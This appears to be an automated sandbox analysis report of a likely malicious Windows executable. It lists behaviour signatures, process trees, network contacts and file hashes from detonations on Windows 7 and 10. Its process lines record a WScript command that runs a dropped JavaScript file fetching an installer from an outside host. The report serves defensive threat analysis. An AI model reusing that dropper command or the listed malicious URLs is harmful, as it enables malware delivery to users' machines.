Analysis Overview
SHA256
60c1fa3596584a9dd18663cf5f312f25cae53171c14a040f093081475659a1bd
Threat Level: Likely malicious
The file 9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 04:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 04:45
Reported
2024-06-11 04:48
Platform
win7-20240215-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 556
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf114F.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
| MD5 | a11395f7801c68fc08a42adb49b4965e |
| SHA1 | 0c74ca1cdff73ee75d673be8392f684cb940424a |
| SHA256 | 0f0872262930f542ec7bc30f72ff445d2b4746cf09559dbea45f5d0d0e9313b8 |
| SHA512 | 3311e87431fa28cd668fabbd20616587edf18e7f4b4f57a54bbc5e4f3b341be21b8aa5cb63f24402623ffb1af99fd2b3d45fbb67ee7580122487857e525a916d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\NI3ZJXGP.txt
| MD5 | 80b3ebbd38856710320e1b7fd40f95c8 |
| SHA1 | 4d92012155fa1c890a8f957c5c62ba9fc815cdcb |
| SHA256 | 31b02e14b8accdfdeeeb386b7ce02c875343d32051f3a530b242888c9697e666 |
| SHA512 | fa488fcfea6783af2f4fa8ecf0fac39076f29cfaea930892999404df5778898ad8bd2347c6b56a909ab40877e2752ac507b3a905d4645c9c19dcd05e37544f8d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 99ea8df7fc53ad6cf1911727b0792df3 |
| SHA1 | 4bf99bdab1bb518d68d6348656ab1fe99026e523 |
| SHA256 | fb5d2e21e58711e3397f66d7ba1a54e85785176a5d7496827e18cde5ee0fa297 |
| SHA512 | f50c8feb6278ab5ad97c75d90de275f985f190a008c6f42c5393f269373890ee22e0f29babbd146dc6f139c1cdd5608ddb19223664e060ac0e52d9c5c3790e58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8f0cf3b71a451da3e7af0bb4e0bb4ffd |
| SHA1 | 5575484c9272d9fed909e90939b89fa877fe409a |
| SHA256 | 0adc93cc3123c74a31ccb8beb4817f2c9211429540defd2d107403035b18bfd0 |
| SHA512 | 852b96c736cd8203ce2e16f7e18862d49cbdd7acaa347d9df3fdf76c0d5b44ef4b12c1160ba86722a95ef595d0b37e78c4d489cf480af12a0fa4c9ecf07e38ae |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | de9270c4fb4e097ccfcaf6aae02263e7 |
| SHA1 | 6464fd7978f85caa0b5009870c2bdece33b416f5 |
| SHA256 | 499b51512a779635f5f17495011fae2970879395c31223ef0cc4553de77ca93e |
| SHA512 | 44a5ad9b6055801bbea6445cd4c6a429296948df152c005527437a57a726c7dad28ea8762d6265b8443b2ccc63ae4e2a892fccd028ea534a0a75868043a12292 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 61442f25854d3a90e776e2858a8d179d |
| SHA1 | 17ba1314fc0778a6e8df6dc17d14ca93515d91bd |
| SHA256 | bca86280bbd294f04935238e52545a2e9f6f1b22c66695b4f0f937857476e9a8 |
| SHA512 | 682278934ce25bdf5a2751d95d7c15b4edf4e42e5ec40ed824a539fbdac4b11fa611e2d9723d9c138ecb66529e5275ac229c6f6df936f4adb856943b16dd9fde |
C:\Users\Admin\AppData\Local\Temp\Cab40C8.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
| MD5 | 497c745764e5e2f5a2f758a154447563 |
| SHA1 | b2d90a47d3cba6be321dbef5517db4d707d81383 |
| SHA256 | 0c791e92516955d33748798234a3bde2e89aafd7d7332bc4b002e68d28ee1e79 |
| SHA512 | d9be8e7638fd93acfd46014c5d382d52cadef4936a2a66ac5e4cad4cfe4772cb89cfe610566323f2bf9700d4c9d73c367b920b2dea26f9c40800f05cb2fdee58 |
C:\Users\Admin\AppData\Local\Temp\Tar5909.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
| MD5 | 6c4a2100fac8650c3e091f14b67f66dc |
| SHA1 | 27ac6da44057312d651c360720da64213fe54f10 |
| SHA256 | 73b4bbbb8724207a4298fede2ece8df65a3581e3cd27b3220d3a15663bbce86c |
| SHA512 | 9da9629c43c3dfe7fa8e96384638d469b5b8e7a7798e407712eac7d9696e395c5d388d4e9f390ba2ae2ff4f926a81a31be630b098bf7bbff90da9f9b854642d4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
| MD5 | 5d2897dbff252c55f28a7934e1281a71 |
| SHA1 | 2965d8a0dc07e4760db0683fe2ff1d782130ebde |
| SHA256 | e72115813298377ab36616a7cbfa996b691a4d704966604ce47017ebd954a436 |
| SHA512 | 098554ed37dc00580dce916941ce71b52874a8382e4aa9c54349b15bdfaa93a54855b2223831f8e497b27d93f45f314ec836d077b41dc5ba45473321146f0be5 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 04:45
Reported
2024-06-11 04:48
Platform
win10v2004-20240226-en
Max time kernel
141s
Max time network
160s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1416 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1964 -ip 1964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1452
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 66.154.119.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | 191.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf4031.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |